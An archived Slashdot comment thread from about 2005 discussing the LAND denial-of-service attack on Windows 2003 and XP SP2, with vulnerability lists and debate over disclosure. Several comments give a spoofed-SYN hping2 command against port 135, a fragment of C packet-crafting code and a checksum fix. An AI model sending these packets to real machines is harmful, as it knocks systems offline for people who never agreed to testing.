Windows 2003 and XP SP2 Vulnerable To LAND Attack 534
An anonymous reader writes "Dejan Levaja, a Serbian security engineer has discovered that nearly 8 years after the attack was first made public, WIndows 2003 and Windows XP SP2 are in fact vulnerable to the historic LAND attack." Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.
Re:Only win ? (Score:5, Informative)
What is the LAND attack? (Score:5, Informative)
So it's a way to either remotely lock up or reboot a target machine. I would assume (not having, you know, tried it or anything) that this includes most windows-based webservers.
Re:News? (Score:5, Informative)
Two things of note: (Score:2, Informative)
"LAND attack:
Sending TCP packet with SYN flag set, source and destination IP address and source and destination port as of destination machine, results in 15-30 seconds DoS condition."
If I understand correctly, this means the vulnerable machine will attempt to synchronise a connection with itself?
I find this quote enlightening:
"Ethic:
Microsoft was informed 7 days ago (25.02.2005, GMT +1, local time), NO answer received, so I decided to share this info with security community. "
So the vulnerability was made public. So exploits are going to be made. However, if Microsoft, who claim to have shifted more focus to security issues, had even acknowledged this report, the vulnerability wouldn't have become public so soon without a patch.
Kinda worries you about the way computer security is handled, doesn't it?
Want to do your own testing? (Score:4, Informative)
hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd
Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test
MOD PARENT UP ! (Score:4, Informative)
BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable
BSDI 3.0 NOT vulnerable
Digital UNIX 4.0 NOT vulnerable
FreeBSD 2.2.2-RELEASE IS vulnerable
FreeBSD 2.2.5-RELEASE IS vulnerable
FreeBSD 2.2.5-STABLE IS vulnerable
FreeBSD 3.0-CURRENT IS vulnerable
HP-UX 10.20 IS vulnerable
IRIX 6.2 NOT vulnerable
Linux 2.0.30 NOT vulnerable
Linux 2.0.32 NOT vulnerable
MacOS 8.0 IS vulnerable (TCP/IP stack crashed)
NetBSD 1.2 IS vulnerable
NeXTSTEP 3.0 IS vulnerable
NeXTSTEp 3.1 IS vulnerable
Novell 4.11 NOT vulnerable
OpenBSD 2.1 IS vulnerable
OpenBSD 2.2 (Oct31) NOT vulnerable
SCO OpenServer 5.0.4 NOT vulnerable
Solaris 2.5.1 IS vulnerable (conflicting reports)
SunOS 4.1.4 IS vulnerable
Windows 95 (vanilla) IS vulnerable
Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable
Re:I know its been around, but...Linking to source (Score:5, Informative)
---snip---
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=si
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->
ipheader->protocol=IP_TCP;
ipheader->sa
ipheader->daddr=sin.sin_
tcpheader->th_sport=sin.sin_port;
tcpheader->t
tcpheader->th_seq=htonl(0xF
tcpheader->th_flags=TH_SYN;
tcpheader->th_o
tcpheader->th_win=htons(2048);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr
pseudoheader.daddr.s_addr=sin.sin_addr.s
pseudoheader.protocol=6;
pseudoheader.len
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
---snip---
At least Windows NT is supposedly patched. (Score:5, Informative)
Explanation of LAND attack (Score:3, Informative)
Exploit (Score:1, Informative)
Re:Can anyone confirm? (Score:2, Informative)
for up to 30 seconds after the attack , I can move the mouse, but cannot click on anything.
All network activity stops during that time also.
Re:Can anyone confirm? (Score:4, Informative)
A test listed in an above comment of mine worked for my box. DL hping2 and try:
hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd
Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test
Re:What kind of software dev process do MS use? (Score:4, Informative)
exploit (Score:5, Informative)
Unfortuntately the b0rked Slashdot lameness filter won't allow code to be posted even when 'post as code' is selected :?
Re:wow (Score:2, Informative)
Turn off the firewall? (Score:4, Informative)
OK, so what you're saying is that in order for XP to be vulnerable, it must be directly connected to the Internet, the user must specifically have disabled the firewall, and no intermediate firewall must be present.
At what point do we cease blaming Microsoft for stupid user tricks? I mean, Microsoft has freely given SP2 to anyone who wants it. Pretty soon it will be a mandatory download from WindowsUpdate. People bitched and moaned for years that Microsoft didn't do enough for security and didn't default to having updates apply automatically. But when Microsoft finally does improve security (with a better firewall) and tries to turn it all on by default, everyone griped. Damned if you do...
Look, if a Windows zealot took something like Fedora, turned on a bunch of services, turned off the firewall, and then griped because his box got hacked, Slashdotters everywhere would be screaming that this guy was a fool, that Linux security is great when it's not sabotaged by an idiot at the keyboard. And they'd be right. But when an attack requires that a Windows user actively subvert the very security measures Microsoft's put in place to protect him, everybody blames Microsoft. Nope, no bias to see here, citizens, please move along.
Ho hum (Score:3, Informative)
Re:Can anyone confirm? (Score:1, Informative)
Re:Want to do your own testing? (Score:1, Informative)
[send_ip]sendto: 10004
which i have no idea if it works or not becuase i never used this before.
Re:Only win ? (Score:5, Informative)
1st: The checksum code is always off by 3 in that file. Subtract 3 from the value before you take the complement and it'll be right. (this is a kludge, I haven't taken the time to actually figure out why it's wrong yet)
2nd: It causes 100% CPU usage on a WinXP SP2 box for about 3 seconds for each packet sent!!!
3rd: It can be blocked (and probably IS blocked) by most routers since the source and destination addresses are the same.
I got permission to send one of these packets to my friends Win2003 box and as far as we can tell, it didn't do anything. I don't know if the packet is getting through though.
4th: Also, I retested the Mac, and again, the malformed packet did nothing.
Re:UNLABELED too. (Score:1, Informative)
If you can't think of 100 good reasons why a security professional or curious sysadmin would want a copy of this code, which, I'll note, has been around in this form for almost 8 years (to the point where it won't even COMPILE on a modern system), then you should put your computer back in its box and ring UPS to get it shipped back to the manufacturer, because you are too stupid to own it.
To elaborate, because you're obviously not so quick on the uptake; 'there is nothing inherently wrong with possessing a tool.' To elaborate further, this snippet of code can be used to verify that any vendor-supplied patch does, in fact, do what it says, amongst other things.
Think before spouting your mouth off. Your post espouses all of the bad ideas behind laws such as the DMCA. With people like you doing the thinking, is it little wonder that such laws get passed?